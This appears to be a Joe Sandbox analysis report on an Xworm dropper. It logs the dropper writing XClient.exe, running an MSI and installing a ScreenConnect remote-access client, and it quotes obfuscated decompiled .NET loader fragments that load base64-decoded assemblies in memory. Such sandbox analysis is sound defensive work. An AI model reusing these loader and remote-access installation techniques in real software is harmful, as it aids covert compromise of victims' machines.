Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6468 -s 1660
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "da688179-c868-42aa-9dc4-8a578037eae5" "User"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "ee6c8909-d1a4-483d-8312-a72e084df991" "System"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\ex.msi"	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B83268768F730349AA78A07AA19DE1CB C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D3F98F32885A6934CA959398DEA944C7	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 44FEF3726CF7825BD3EF7883E408F966 E Global\MSI0000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI41FF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5128828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "da688179-c868-42aa-9dc4-8a578037eae5" "User"	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "ee6c8909-d1a4-483d-8312-a72e084df991" "System"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 6468 -ip 6468
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6468 -s 1660
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable

Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{aOY1LHkSxcz7bCNxQCW.QTIsxKUHJ0UN309CpAk,aOY1LHkSxcz7bCNxQCW.DrQrVILTJzR8hUEKldd,aOY1LHkSxcz7bCNxQCW.g6UmqRqXwr9pllK5jAZ,aOY1LHkSxcz7bCNxQCW._9vGRyIMVLwnlolqKp5T,j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.QvzeYUYZaaQxbjwzwPliU2zXV0RFlM6Okms4yBVoP3ysFnxEzbA()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KbcQIqT9UJeYYtEQDuK[2],j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu._05eknny47V4wElsVNc2lijPDP6IJCG32n1Q08VG6pUCJKBcDESc(Convert.FromBase64String(KbcQIqT9UJeYYtEQDuK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{aOY1LHkSxcz7bCNxQCW.QTIsxKUHJ0UN309CpAk,aOY1LHkSxcz7bCNxQCW.DrQrVILTJzR8hUEKldd,aOY1LHkSxcz7bCNxQCW.g6UmqRqXwr9pllK5jAZ,aOY1LHkSxcz7bCNxQCW._9vGRyIMVLwnlolqKp5T,j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.QvzeYUYZaaQxbjwzwPliU2zXV0RFlM6Okms4yBVoP3ysFnxEzbA()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KbcQIqT9UJeYYtEQDuK[2],j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu._05eknny47V4wElsVNc2lijPDP6IJCG32n1Q08VG6pUCJKBcDESc(Convert.FromBase64String(KbcQIqT9UJeYYtEQDuK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{aOY1LHkSxcz7bCNxQCW.QTIsxKUHJ0UN309CpAk,aOY1LHkSxcz7bCNxQCW.DrQrVILTJzR8hUEKldd,aOY1LHkSxcz7bCNxQCW.g6UmqRqXwr9pllK5jAZ,aOY1LHkSxcz7bCNxQCW._9vGRyIMVLwnlolqKp5T,j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.QvzeYUYZaaQxbjwzwPliU2zXV0RFlM6Okms4yBVoP3ysFnxEzbA()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KbcQIqT9UJeYYtEQDuK[2],j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu._05eknny47V4wElsVNc2lijPDP6IJCG32n1Q08VG6pUCJKBcDESc(Convert.FromBase64String(KbcQIqT9UJeYYtEQDuK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.cs	.Net Code: ekkHJ3mmuD9PGoANEu1 System.AppDomain.Load(byte[])
Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.cs	.Net Code: VDzxT4Q84X0csXGwfVo System.AppDomain.Load(byte[])
Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.cs	.Net Code: VDzxT4Q84X0csXGwfVo
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	.Net Code: ekkHJ3mmuD9PGoANEu1 System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	.Net Code: VDzxT4Q84X0csXGwfVo System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	.Net Code: VDzxT4Q84X0csXGwfVo
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	.Net Code: ekkHJ3mmuD9PGoANEu1 System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	.Net Code: VDzxT4Q84X0csXGwfVo System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	.Net Code: VDzxT4Q84X0csXGwfVo

Source: MSI41FF.tmp.3.dr	Static PE information: real checksum: 0x2f213 should be: 0x1125d0
Source: XClient.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x16f10

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	Code function: 0_2_00007FF88B1F00BD pushad ; iretd	0_2_00007FF88B1F00C1
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 2_2_00007FF88B2000BD pushad ; iretd	2_2_00007FF88B2000C1
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Code function: 9_2_01187732 push eax; iretd	9_2_01187739
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Code function: 9_2_01187752 push 8403E6CFh; iretd	9_2_01187759
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Code function: 9_2_055CBD00 push eax; iretd	9_2_055CBD01
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Code function: 9_2_055CBD03 pushad ; iretd	9_2_055CBD19
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Code function: 9_2_05AC4020 push esp; ret	9_2_05AC4033
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 16_2_00007FF88B2100BD pushad ; iretd	16_2_00007FF88B2100C1
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B2200BD pushad ; iretd	19_2_00007FF88B2200C1
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B532061 push ds; iretd	19_2_00007FF88B532068

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe

Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 5Q3MO7HER4QVrhh3m4LI7MNWRpF0DKBUqy.cs	High entropy of concatenated method names: 'SBFDL8w68lckIYyO9Cnvs01QkKyPaPbV0G', 'ycW4NY88LzYVFAmMPBn1ezA0fq3JZ2BiBj', 'LFAskUx5Ob3nTmgK9BeCl7sypeLJGncKa2', 'QkERNOiIwJnUE6KPE8BF7cpnckjrUa3QLe', 'ltpfuyZWogm8aCeOI0OUT4GqmXEELowxMd', 'EZqPrfxyhNe5frUfRSEpqH6189WA5RLAFM', 'Z3c03WvXkn1YRArRBjOPs7laTNHAMVEV63', 'c26M0KZ10RoR0LYOiUxhZWjvhovAYkfH56', '_6PBwoJGJLF000Yiij75KjZwYfACWnFi5gl', 'ioWfH07YJ0aulaPuTm0RIuzN62dyCe1Nkt'
Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, rHvdV02fL5QQLikiFsJ4PSRd1PV4WYViYz.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'TWcJGkiGMqpnoiZgAKlhoM90Nk7l26Tr9Z', 'luoj1v0s5I433cYGVpbLKljY87vHoLUGbk', 'm2A9ZzynKme0hEqv9ddmTqDzqqIKImeqLK', 'TQplzSO0Te4723tw5n3PH8sWqVJ6rLPOOR'
Source: XClient.exe.0.dr, ipQBGHtOli8FsdvUrICHUQGCaKXp4kZTzUvcHh0kSfN96VRQKcE.cs	High entropy of concatenated method names: 'pat8Jmb6Y3fVcrPtL1Z4Geu2isETsDV2vCvSXt7Mg6i29bkYoh5', '_9LqgpCT0wm8b8wMEwuxQSLp7cNVNA2rkOYUEtOQu4YBBcNSdPME', 'WIl9K3WqOPWOcIYEfxMtSAh1HbUmrzbaLurxMvynPc32WtcmiTj', 'a5kzdzg3HLQ', 'Ht3WasYKPuj', 'pnyv45Hy8LS', 'eUKfGQ0ryft', '_2ZyucE7JLEh', '_6DsE6k9MkQE', 'CLgQaZa1q5v'
Source: XClient.exe.0.dr, aOY1LHkSxcz7bCNxQCW.cs	High entropy of concatenated method names: 'WxXahuCOFEVUX8YwHBXgUzre8PPvZOccVGWnV', 'udJnGVG5BX8a0x17De5vjBisXASL4It0rpgad', 'f4P382k0bLtGwSaO4LWwtjLcqFEJweaLp8QR7', '_533lYKmbIIoU0cbbDLfDd8kxGQT2GmNBJwCjD'
Source: XClient.exe.0.dr, ZCpsIWfDS7AkpK9SKjuwhH4KkL4LSGD6th7sJ2hAa0ZVEq51hCmhMVSafkw7M38e5XZLdMicldIn7.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'ZYOKKT5w3GBHY4kJne8wizAtzWeXZgDGGuLUC', '_9dlIsfrCf1uOpOVJYiWUu49AQOhS4OiQ16y4W', 'PvbdRdJbGx4288CxPeLwEkTqpsm7pB2BGNFZq', 'aaZGIVo6wJtASEnwPZ9Sy1qATExnWIlI0tA1j'
Source: XClient.exe.0.dr, yNOK9yy0EKNGljbHJy5.cs	High entropy of concatenated method names: 'HmKj8f2UpIC4WXD6cga', 'ekkHJ3mmuD9PGoANEu1', 'idLGquPdixZnDbopEyB', 'mTRqbYcTSOZyBbB5FeH', 'YyGs8eE9dPBhF3MiPv9', 'bmgAcruG4jlqHQTwrvy', 'wpTgTsMVrYjXW16ueio', 'ndiNw4k0g7M1AMgqMhk', 'UPo6MGr04FyiFQxxqTz', 'aBOp4u9COf4kMyc6NNq'
Source: XClient.exe.0.dr, R6ucxiO1Ll9Uiqd2r7r.cs	High entropy of concatenated method names: '_2DLzGtrM3rdImQqlpGK', 'R53XZECzmMWs6gnGM3H', 'JNTme6KWPk1e3Hl5ynq', 'k5EjjSL9ZIpNjValRcPI73Fx3HbJWJxdYSNjMpg6XT7c8TqhEU6FJM9qgqrxtFJkj2Y7V', 'XuxW4ZTdl5WlSDTTMKnxDhSVuPoCC8rroUUhOohbm8nWBXeV6sGnksKuARPDdV2x9zAq2', 'qXSc4n77SNw94UtawAlPPdHxkPJpxdy14TQRZ7CiJ1QMVU2YmQM703BdtZrKSFk7lPy5f', 'XjYcSsOuP4PnE1LxjSQ80zukitMlsHPeoR0Ua0K0dwXMYSr7JptKNEApoJhkmk4zM9n3m', 'yKwussRCHNLBnDyfF2elQQ99RkoBIFN9mU5BoD7UMdAUQ3Vwqr6TCRP5bHPwzdgyRk9yU', 'AtWYBfFnnwqCRxvYCTGWRtwHT2zQy3E1TATaP1R1IqvgKt44cx8fQLupK0iVG7lySsoy0', 'XxCPjcMW4umdDOse8GoyFMrGJn1MpBAEePzdcnMp9t8US7KMhFK63tUwml7flJepB3sX4'
Source: XClient.exe.0.dr, bBpHSt10PQXanEg3s65.cs	High entropy of concatenated method names: 'njbTfylSdh3DVkASU8B', 'wRFqwzdmUb398NB0tjqKIKNj3HO0IRF4iM5ueNx4DY2RemWHOJLVvukBwaV7YCprtAJzT', '_9HUcVNIFqE5V4cBpmXXwSZJOXL1J4NkPrXWnqLt2jShO2LxV93cnJK1c3UMCWuEUp088A', 'iVajpGwq8QPObtQWs2QCLAm774ZD5AiXepguxghvobo5ckcWCzHt3njKFDd5C2H1MvLP8', 'zPns4ysKQVFejKfpplQBYHFBQDHmuYYH1V8YnTlEWuPtnaT19ycSING03dCltijQTOyHG'
Source: XClient.exe.0.dr, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.cs	High entropy of concatenated method names: 'lMhAN6ieJ9Gj270e3d8l6EuzAUMBNqU7e0PkHcPWsXpFDOT4aDU', 'pITcJHMfLgAJyx2Plpdek5MwZq8QVL1NSfSte1xuToKigzfYhcM', 'X1N6QbUIdblD5ej3yrD1RpCoqH3zqdiwRAenKuHF2kj5bOgN27i', 'jQQEALPZoWpqfBYUXcnOJYScRP9IKN6eaMSmYGZcGsuIJwFxqBz', 'SF1GVCK8i8RGOjTFnFTwxYgNFLa4bV4oZBDmuyRSJlNPAXhbCZf', 'WsJcizhaoEcEAhJ4UE3sbrrsyBWJUV9y6ZYWGIf3N1eRJ9ENYmy', 'OfJY8JSodSrSeYJVXlHsLlQEvNdYYECBtYFnHnaB2zBsSsgpRxo', 'U5WHrHeluK7MpFqfL1PH9OkYhID0nZvE5eZY900wzHRUCc8kDrQ', 'dLy8Y9KJmGOzLl60X5AyBd0RXwBeExMJjcoGfhAc8mbTMzjaMX4', 'Kb3IrrhexuigkuRmIfSWyqQNvWLa6DxOfV0kOrcSu8XB8BytlEB'
Source: XClient.exe.0.dr, dsUdPXhp5sK8qnlF2Z8.cs	High entropy of concatenated method names: 'hu9IREyIUh7b9tqrTwH', 'q5tdLTJOCx538rWyVxP', 'GAyvJAV3BqIFycyTBhK', 'LII6FqpHgazlxktlAO3', 'JcWQpZU9DeZrpN3z0XO', 'AvF7gTZZ984KiKpgVQE', 'clk2pToYFRt1nb6AAUj', '_6fjYweCLJHPkRTYeZuV', 'P9pDEcOMz199mTqUmf7', 'w6AGO8ujJxryr9R3Yl8'
Source: XClient.exe.0.dr, tLU2VSaMPJVr9yYF210.cs	High entropy of concatenated method names: '_8Dv9Vs0yYdsXpix8YZ5', '_33mfWWmtXmIFlbwYjbP', 'fyV6ElXjQFVoD7Yg3kF', '_0BDIFbEntewBARUJ4AW', 'fqIvHQf6rAwJUitJOP8', '_95cb8wIZ0IiuEdW06pv', 'vofk0Ebiv5msx02tB68', 'ANjcVj4YuJXZH1VS6tu', 'i7usY4bVPNyXwaMZ5Ju', 's0jWpDKqEC1xDlifl9S'
Source: XClient.exe.0.dr, 5XWegNUSYQmoH9YsXWwL3Z5IjscWBkw0lURjMwsQ9tAyS4PHWjw.cs	High entropy of concatenated method names: 'LWDWjlJsqySwJDhxKwnA1ob1nnOruYHv9gzUB79qBivHrjTnney', 'Y0VjIJJmphFLtNgnVRlJtkb6Zvac4d8CsGISBXZvh4UUkyJFWZK', 'rC50bPsbhHc', 'ZCzCuMnDJHI', 'dNNMngHzGun', 'KkeGQAswrfy'
Source: XClient.exe.0.dr, 9mKnnIJtPQLqnwuwN1X.cs	High entropy of concatenated method names: 'eWyI97yyAY8tIl80q4N', '_1dQrlFoEc0nmRImvsgz', '_0cHWb2aV6xgzjJsjWcI', 'Q5p8BUNetdTWjQBMuQe', 'xZLnEQZRC0RP8JfNkXV', 'EV5O9Od9dWdTAgnAIFf', 'Hcv1gbLjQkP5jymonLm', '_46t0mKTweJXPdiP4vnI', 'DmQzLGXanTZDm5YW6W5t3kBYYhBr81G4QE92ZruwFYaHVASOM5T', '_81I9aQAGvNUhA6REsbvamffB0q2JhjBD4Poo3E4Kv3xJdmaKzK1'
Source: XClient.exe.0.dr, xlOlMInMQpmeBLv2Td7q6lNkfsP2MFkqfuNevjXRwqob1nCSpZW.cs	High entropy of concatenated method names: 'zHqvhuLG3DMOxlZdsTXjrI8UgLF7nmFNxZLihWZnWCXahOtHf0U', 'iMWGDPZByTOs606Zhm1RtdYkO4BkCLldZDD1INwoNnlFpui3dVU', 'xGnaDo0bmxRAlqiv1AKIb2U13PWHwEAKXVU0alG8Kn47vh5P8gY', 'hWr0UVh8hAMIAlHTTh7zBHwmMBHpI9Xn2Bnxy5dG80yQoq2l4ic', 'YAZvi16fJEn', '_3f2Tt8ab2V3', 'vyuWNSKG9jS', 'rQMkjoOKIcj', 'hdA0o0L81xT', '_9nXD0KODXut'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, ipQBGHtOli8FsdvUrICHUQGCaKXp4kZTzUvcHh0kSfN96VRQKcE.cs	High entropy of concatenated method names: 'pat8Jmb6Y3fVcrPtL1Z4Geu2isETsDV2vCvSXt7Mg6i29bkYoh5', '_9LqgpCT0wm8b8wMEwuxQSLp7cNVNA2rkOYUEtOQu4YBBcNSdPME', 'WIl9K3WqOPWOcIYEfxMtSAh1HbUmrzbaLurxMvynPc32WtcmiTj', 'a5kzdzg3HLQ', 'Ht3WasYKPuj', 'pnyv45Hy8LS', 'eUKfGQ0ryft', '_2ZyucE7JLEh', '_6DsE6k9MkQE', 'CLgQaZa1q5v'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, aOY1LHkSxcz7bCNxQCW.cs	High entropy of concatenated method names: 'WxXahuCOFEVUX8YwHBXgUzre8PPvZOccVGWnV', 'udJnGVG5BX8a0x17De5vjBisXASL4It0rpgad', 'f4P382k0bLtGwSaO4LWwtjLcqFEJweaLp8QR7', '_533lYKmbIIoU0cbbDLfDd8kxGQT2GmNBJwCjD'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, ZCpsIWfDS7AkpK9SKjuwhH4KkL4LSGD6th7sJ2hAa0ZVEq51hCmhMVSafkw7M38e5XZLdMicldIn7.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'ZYOKKT5w3GBHY4kJne8wizAtzWeXZgDGGuLUC', '_9dlIsfrCf1uOpOVJYiWUu49AQOhS4OiQ16y4W', 'PvbdRdJbGx4288CxPeLwEkTqpsm7pB2BGNFZq', 'aaZGIVo6wJtASEnwPZ9Sy1qATExnWIlI0tA1j'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, yNOK9yy0EKNGljbHJy5.cs	High entropy of concatenated method names: 'HmKj8f2UpIC4WXD6cga', 'ekkHJ3mmuD9PGoANEu1', 'idLGquPdixZnDbopEyB', 'mTRqbYcTSOZyBbB5FeH', 'YyGs8eE9dPBhF3MiPv9', 'bmgAcruG4jlqHQTwrvy', 'wpTgTsMVrYjXW16ueio', 'ndiNw4k0g7M1AMgqMhk', 'UPo6MGr04FyiFQxxqTz', 'aBOp4u9COf4kMyc6NNq'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, R6ucxiO1Ll9Uiqd2r7r.cs	High entropy of concatenated method names: '_2DLzGtrM3rdImQqlpGK', 'R53XZECzmMWs6gnGM3H', 'JNTme6KWPk1e3Hl5ynq', 'k5EjjSL9ZIpNjValRcPI73Fx3HbJWJxdYSNjMpg6XT7c8TqhEU6FJM9qgqrxtFJkj2Y7V', 'XuxW4ZTdl5WlSDTTMKnxDhSVuPoCC8rroUUhOohbm8nWBXeV6sGnksKuARPDdV2x9zAq2', 'qXSc4n77SNw94UtawAlPPdHxkPJpxdy14TQRZ7CiJ1QMVU2YmQM703BdtZrKSFk7lPy5f', 'XjYcSsOuP4PnE1LxjSQ80zukitMlsHPeoR0Ua0K0dwXMYSr7JptKNEApoJhkmk4zM9n3m', 'yKwussRCHNLBnDyfF2elQQ99RkoBIFN9mU5BoD7UMdAUQ3Vwqr6TCRP5bHPwzdgyRk9yU', 'AtWYBfFnnwqCRxvYCTGWRtwHT2zQy3E1TATaP1R1IqvgKt44cx8fQLupK0iVG7lySsoy0', 'XxCPjcMW4umdDOse8GoyFMrGJn1MpBAEePzdcnMp9t8US7KMhFK63tUwml7flJepB3sX4'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, bBpHSt10PQXanEg3s65.cs	High entropy of concatenated method names: 'njbTfylSdh3DVkASU8B', 'wRFqwzdmUb398NB0tjqKIKNj3HO0IRF4iM5ueNx4DY2RemWHOJLVvukBwaV7YCprtAJzT', '_9HUcVNIFqE5V4cBpmXXwSZJOXL1J4NkPrXWnqLt2jShO2LxV93cnJK1c3UMCWuEUp088A', 'iVajpGwq8QPObtQWs2QCLAm774ZD5AiXepguxghvobo5ckcWCzHt3njKFDd5C2H1MvLP8', 'zPns4ysKQVFejKfpplQBYHFBQDHmuYYH1V8YnTlEWuPtnaT19ycSING03dCltijQTOyHG'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.cs	High entropy of concatenated method names: 'lMhAN6ieJ9Gj270e3d8l6EuzAUMBNqU7e0PkHcPWsXpFDOT4aDU', 'pITcJHMfLgAJyx2Plpdek5MwZq8QVL1NSfSte1xuToKigzfYhcM', 'X1N6QbUIdblD5ej3yrD1RpCoqH3zqdiwRAenKuHF2kj5bOgN27i', 'jQQEALPZoWpqfBYUXcnOJYScRP9IKN6eaMSmYGZcGsuIJwFxqBz', 'SF1GVCK8i8RGOjTFnFTwxYgNFLa4bV4oZBDmuyRSJlNPAXhbCZf', 'WsJcizhaoEcEAhJ4UE3sbrrsyBWJUV9y6ZYWGIf3N1eRJ9ENYmy', 'OfJY8JSodSrSeYJVXlHsLlQEvNdYYECBtYFnHnaB2zBsSsgpRxo', 'U5WHrHeluK7MpFqfL1PH9OkYhID0nZvE5eZY900wzHRUCc8kDrQ', 'dLy8Y9KJmGOzLl60X5AyBd0RXwBeExMJjcoGfhAc8mbTMzjaMX4', 'Kb3IrrhexuigkuRmIfSWyqQNvWLa6DxOfV0kOrcSu8XB8BytlEB'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, dsUdPXhp5sK8qnlF2Z8.cs	High entropy of concatenated method names: 'hu9IREyIUh7b9tqrTwH', 'q5tdLTJOCx538rWyVxP', 'GAyvJAV3BqIFycyTBhK', 'LII6FqpHgazlxktlAO3', 'JcWQpZU9DeZrpN3z0XO', 'AvF7gTZZ984KiKpgVQE', 'clk2pToYFRt1nb6AAUj', '_6fjYweCLJHPkRTYeZuV', 'P9pDEcOMz199mTqUmf7', 'w6AGO8ujJxryr9R3Yl8'
